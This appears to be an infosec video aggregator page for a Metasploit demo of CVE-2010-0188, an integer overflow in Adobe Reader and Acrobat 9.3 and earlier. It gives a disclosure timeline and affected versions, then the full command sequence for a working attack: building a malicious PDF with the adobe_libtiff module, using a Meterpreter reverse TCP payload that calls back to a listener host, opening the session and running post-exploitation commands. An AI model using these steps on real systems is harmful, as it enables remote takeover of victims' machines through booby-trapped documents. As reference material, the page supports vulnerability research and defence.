Description: Timeline :
Vulnerability reported by Microsoft to vendor
Coordinated public disclosure the 2010-02-16
PoC provided by villy the 2010-03-12
Metasploit PoC provided by duck the 2010-03-16
PoC provided by villy on Exploit-DB the 2010-03-17
PoC provided by:
Microsoft
villy
jduck
Reference(s) :
CVE-2010-0188
Affected versions :
Adobe Reader 9.3 and earlier versions for Windows, Macintosh, and UNIX
Adobe Acrobat 9.3 and earlier versions for Windows and Macintosh
Tested on Windows XP SP3 with Adobe Reader 9.3.0
Description :
This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions 8.0 through 8.2 and 9.0 through 9.3.
Metasploit demo :
use exploit/windows/fileformat/adobe_libtiff
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j
sessions -i 1
sysinfo
getuid
ipconfig
Owned !
Tags: metasploit , adobe , pdf , reader , acrobat , hack , windows , microsoft ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.